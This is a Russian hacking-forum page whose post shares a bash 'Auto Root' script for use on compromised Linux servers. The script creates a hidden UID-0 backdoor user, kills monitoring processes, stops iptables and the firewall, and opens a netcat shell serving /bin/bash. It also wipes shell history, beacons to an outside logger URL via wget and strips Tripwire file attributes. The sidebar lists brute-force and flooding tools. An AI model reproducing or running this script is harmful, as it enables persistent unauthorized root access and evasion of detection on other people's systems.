Главная Форум Файлы Статьи СОСТАВ ZH&ZHS О НАС GITHUB КАНАЛ YouTube BlackList WhiteList
Добро пожаловать на уникальный игровой портал ZETA-HACK TEAM! Здесь Вы сможете найти самые интересные новости из мира игровой индустрии, найти самые свежие сотфины для различных онлайн игр, общаясь на форуме получать мнения специалистов и помогать тем кто не смог получить нужный ответ в той или иной сфере!
Авторизация Регистрация
Последние обсуждаемые темы на форуме
Последние комментарии к новостям
Топ-10 форумчан
Как защитить свой хостинг от D... =AlexDrift= 0
Ts3Bypass.c =AlexDrift= 3
KGreenOVHUdp.c =AlexDrift= 2
QUERY flooder AdCKuY_DpO4uLa 0
Заявочка G1TLER 3
Делаем лаунчер SA-MP или инжек... [FBI]@PUNISHER@ 0
[PYTHON] Ftp Brute Force =AlexDrift= 0
[PHP] Skype BruteForce =AlexDrift= 0
[PHP] Facebook Email Checker =AlexDrift= 0
[PYTHON] Gmail Bruteforce XMPP =AlexDrift= 0
Driftyulex_m0d ака Drifeit_m0d 0.3e v7.9 22.10.2019
Собейт Driftyulex_m0d 7.9 для CR:MP 0.3e... 22.10.2019
Microsoft назвала дату смерти Windows 7 10.09.2019
MemorandoomXack/devblog 59-60/Чит/Хак/Ha... 04.09.2019
x-gaming dm 0.3e 23.05.2019
x-gaming dm 0.3e 12.05.2019
x-gaming dm 0.3e 12.05.2019
Microsoft назвала дату смерти Windows 7 25.04.2019
[0.3е]Русский ДМ сервер 18.04.2019
[0.3.7]Forward-Evolution DM by [KrYpToDe... 18.04.2019
1. =AlexDrift= 585
2. Pahanch1kkk 46
3. AdCKuY_DpO4uLa 36
4. InFerNo 35
5. R4DUGA 32
6. d1amondl1on 31
7. [NACIONAL]IST_BERZ 23
8. Julia 21
9. Lil_Jonson 17
10. Effect 15
Витрина ссылок Купить ссылку (4 р.) » | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка | Ваша ссылка

  • Страница 1 из 1
  • 1
Форум » Hacking и все что с ним связано » DoS/DDoS/Exploits » [Bash] Auto Root
[Bash] Auto Root
24.07.2019 в 18:21
#1
=AlexDrift=
Не важны козыри если игра не на счет...
Статус: Offline
Регистрация: 24.11.2012
Сообщения: 585
Репутация: 84
Что бы добавить медаль "Легенда портала" добавляем в ?if "or 1='ID пользователя'"
Что бы добавить медаль "Золотой страж" добавляем в ?if "or 1='ID пользователя'"
Код
#!/bin/bash
# This is a auto root script, helps add users kills daemons and a few other useful things!
# Want to have the server get logged on execution? Edit the 'Logger' link!
# -- Edit? -- #
LOGGER="http://blasze.tk/EXAMPLE"

# -- Don't Touch -- #
uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd
ip=`ifconfig eth0 2>/dev/null|awk '/inet addr:/ {print $2}'|sed 's/addr://'`

# -- Colors -- #
RED='\033[0;31m'
CYAN='\033[0;36m'
LG='\033[0;37m'
NO='\033[0m'
GR='\033[1;32m'

# -- Banner --#
echo '''
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 ____ ____ ____ ____ ____ ____ 
||J |||I |||H |||A |||D |||I ||
||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|

Developed by: @Jihadi4Potus
Twitter: https://twitter.com/Jihadi4Potus
Website: http://leakedfiles.org
Version: v1.1 | Updated 7/13/17
[+ Syntax sh $0  [USERNAME] [PASSWORD]+]

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
'''

# -- Setting User/Pass -- #
if [ $# != 2 ]; then
    echo "${LG}[${RED}!${LG}] ${RED}Invalid Arguments.${NO}"
    exit 0
fi

# -- Checks if Root -- #
if ! [ $(id -u) = 0 ]; then
   echo "${LG}[${RED}!${LG}] ${RED}Requires Root, please try agin with root!${NO}"
   exit 1
fi
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash $1
passwd $1

# -- Stopping Security/Daemons -- #
        echo "${RED}Stopping Services ..."; 
        echo "${LG}Servce NSCD ${GR}Stopped!${NO}" && killall -9 -q nscd >/dev/null 2>&1 || echo "${LG}Servce NSCD ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce XNTPS ${GR}Stopped!${NO}" && killall -9 -q xntps >/dev/null 2>&1 || echo "${LG}Servce XNTPS ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce MOUNTD ${GR}Stopped!${NO}" && killall -9 -q mountd >/dev/null 2>&1 || echo "${LG}Servce MOUNTD ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce mserv ${GR}Stopped!${NO}" && killall -9 -q mserv >/dev/null 2>&1 || echo "${LG}Servce mserv ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce psybnc ${GR}Stopped!${NO}" && killall -9 -q psybnc >/dev/null 2>&1 || echo "${LG}Servce psybnc ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce t0rns ${GR}Stopped!${NO}" && killall -9 -q t0rns >/dev/null 2>&1 || echo "${LG}Servce t0rns ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce linsniffer ${GR}Stopped!${NO}" && killall -9 -q linsniffer >/dev/null 2>&1 || echo "${LG}Servce linsniffer ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce sniffer ${GR}Stopped!${NO}" && killall -9 -q sniffer >/dev/null 2>&1 || echo "${LG}Servce sniffer ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce lpsched ${GR}Stopped!${NO}" && killall -9 -q lpsched >/dev/null 2>&1 || echo "${LG}Servce lpsched ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce sniff ${GR}Stopped!${NO}" && killall -9 -q sniff >/dev/null 2>&1 || echo "${LG}Servce sniff ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce sn1f ${GR}Stopped!${NO}" && killall -9 -q sn1f >/dev/null 2>&1 || echo "${LG}Servce snif ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce xsf ${GR}Stopped!${NO}" && killall -9 -q xsf >/dev/null 2>&1 || echo "${LG}Servce xsf ${RED}Failed!${NO}"; sleep 1
        echo "${LG}Servce xchk ${GR}Stopped!${NO}" && killall -9 -q xchk >/dev/null 2>&1  || echo "${LG}Servce xchk ${RED}Failed!${NO}"; sleep 1
        serivce iptables stop 
        service fw stop

# -- Create Reverse Shell w/ Netcat -- #
while true; do
    read -p "Want to open a reverse shell? [Y/n] " answer2
    read -p "Please enter your disired port: ~# " port
    case $answer2 in
        [Yy]* ) yum install screen nc -y >/dev/null 2>&1 || apt-get install screen netcat -y >/dev/null 2>&1; screen -dmSL asdf nc -lvp $port -c /bin/bash >/dev/null 2>&1 || screen -dmSL asdf nc -lvp $port} -e /bin/bash >/dev/null 2>&1; sleep 1; echo "${GR}Success! ${LG}Active Shell on: ${NO}[${RED}${ip}:$port${NO}]"; rm -fr ~/.bashrc >/dev/null 2>&1; history -c >/dev/null 2>&1; wget -q -O /tmp/... ${LOGGER}; break;;
        [Nn]* ) echo "${LG}[${RED}!${LG}] ${RED}Exiting${NO}"; break;;
        * ) echo "${LG}[${RED}!${LG}] ${RED}Invalid Arguments.${NO}";;
    esac
done
sleep 2

# -- Detecting/Killing Tripwire -- #
echo "${CYAN}*/ ${NO}Checking for ${GR}Tripwire ${NO}Process ${CYAN}*/${NO}"
sleep 2
if [ -d /etc/tripwire ]; then
    echo "TripWire: ${GR}DETECTED"
    chattr -isa $twd
else
    echo "TripWire: ${RED}Not Available!${NO}"
   exit 1
fi

В ЛС не отвечу даже не старайтесь. Все вопросы на форум, создавайте тему там ответим.

Форум » Hacking и все что с ним связано » DoS/DDoS/Exploits » [Bash] Auto Root
  • Страница 1 из 1
  • 1
Поиск:

условия предоставления
Авторские права и контакты
счетчики
счетчики
счетчики
Файлы, статьи, публикации на форуме предоставлены исключительно в ознакомительных целях. Все материалы принадлежат исключительно их владельцам! Администрация портала не несет ответственности за последствия использования вами сторонних материалов, опубликованных на форуме, каталоге файлов, каталоге статей, но гарантирует отсутствие вредоносного кода в новостях и публикациях на главной. Напоминаем:Весь материал публикуется только для ознакомительных целей! Администрация не несёт ответственности за размещённые материалы. Все материалы предоставлены в ознакомительных целях и администрация предлагает удалить их после ознакомления.
  • Основатель портала - AlexDrift
  • Автор дизайна, разработчик - Lil Jonson
  • По возникшим вопросам дизайна - liljonson682@gmail.com
  • По всем возникшим вопросам - vk.com/alexdrift1137
  • Уникальный игровой портал ZETA-HACK.RU ® 2011 - 2019
  • Сайт создан в системе uCoz

  • Яндекс.Метрика
    Рейтинг@Mail.ru